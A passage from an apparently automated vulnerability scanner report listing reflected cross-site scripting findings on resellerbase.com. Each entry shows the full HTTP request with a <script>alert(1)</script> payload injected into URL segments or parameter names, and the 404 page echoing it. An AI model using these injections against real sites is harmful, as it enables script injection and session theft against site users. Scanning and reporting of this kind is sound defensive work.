Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/rating/search.php?keyword=search...dd195<a>b06b45bf5c6&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4860. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e3227<script>alert(1)</script>a0b79820419 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&e3227<script>alert(1)</script>a0b79820419=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&e3227<script>alert(1)</script>a0b79820419=1 was not found on this server.</p>
...[SNIP]...

2.4861. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 4e6b7<a>64a22a6ac21 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-vaccation/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=24e6b7<a>64a22a6ac21 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=24e6b7<a>64a22a6ac21 was not found on this server.</p>
...[SNIP]...

2.4862. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e880a<script>alert(1)</script>81c0f0d4b4a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccatione880a<script>alert(1)</script>81c0f0d4b4a/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccatione880a<script>alert(1)</script>81c0f0d4b4a/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.4863. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 56574<script>alert(1)</script>7f6040704fe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes56574<script>alert(1)</script>7f6040704fe/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes56574<script>alert(1)</script>7f6040704fe/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.4864. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 27be4<script>alert(1)</script>33a40fe3e26 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos27be4<script>alert(1)</script>33a40fe3e26/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos27be4<script>alert(1)</script>33a40fe3e26/images/review/ was not found on this server.</p>
...[SNIP]...

2.4865. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 78b88<script>alert(1)</script>bcad9909e63 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/images78b88<script>alert(1)</script>bcad9909e63/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images78b88<script>alert(1)</script>bcad9909e63/review/ was not found on this server.</p>
...[SNIP]...

2.4866. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 68f7e<script>alert(1)</script>e60d7e83f09 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/images/review68f7e<script>alert(1)</script>e60d7e83f09/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/review68f7e<script>alert(1)</script>e60d7e83f09/ was not found on this server.</p>
...[SNIP]...

2.4867. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/review/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 54c92<script>alert(1)</script>414ca89467 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/images/review/?54c92<script>alert(1)</script>414ca89467=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/review/?54c92<script>alert(1)</script>414ca89467=1 was not found on this server.</p>
...[SNIP]...

2.4868. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/0.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ff034<script>alert(1)</script>19dba4bfb10 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccationff034<script>alert(1)</script>19dba4bfb10/themes/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:47:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccationff034<script>alert(1)</script>19dba4bfb10/themes/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.4869. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/0.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 98cb9<script>alert(1)</script>ce88a8924a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes98cb9<script>alert(1)</script>ce88a8924a9/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:47:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes98cb9<script>alert(1)</script>ce88a8924a9/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.4870. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/0.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2fcad<script>alert(1)</script>593495b27dd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos2fcad<script>alert(1)</script>593495b27dd/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:47:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos2fcad<script>alert(1)</script>593495b27dd/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.4871. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/0.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 72598<script>alert(1)</script>44526bc80fc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/images72598<script>alert(1)</script>44526bc80fc/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:47:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images72598<script>alert(1)</script>44526bc80fc/review/0.gif was not found on this server.</p>
...[SNIP]...

2.4872. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/0.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 29564<script>alert(1)</script>be6d695eac3 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/images/review29564<script>alert(1)</script>be6d695eac3/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/review29564<script>alert(1)</script>be6d695eac3/0.gif was not found on this server.</p>
...[SNIP]...

2.4873. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/0.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 504c6<script>alert(1)</script>edafe5c10cb was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/images/review/0.gif504c6<script>alert(1)</script>edafe5c10cb HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/review/0.gif504c6<script>alert(1)</script>edafe5c10cb was not found on this server.</p>
...[SNIP]...

2.4874. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/0.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/review/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e6efe<script>alert(1)</script>295c55f5bd4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/images/review/0.gif?e6efe<script>alert(1)</script>295c55f5bd4=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/images/review/0.gif?e6efe<script>alert(1)</script>295c55f5bd4=1 was not found on this server.</p>
...[SNIP]...

2.4875. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f1aa4<script>alert(1)</script>5d5a351e0fe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccationf1aa4<script>alert(1)</script>5d5a351e0fe/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccationf1aa4<script>alert(1)</script>5d5a351e0fe/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4876. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c27b9<script>alert(1)</script>93a1868348a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themesc27b9<script>alert(1)</script>93a1868348a/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themesc27b9<script>alert(1)</script>93a1868348a/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4877. http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3411e<script>alert(1)</script>5aa0c32cbec was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos3411e<script>alert(1)</script>5aa0c32cbec/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos3411e<script>alert(1)</script>5aa0c32cbec/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

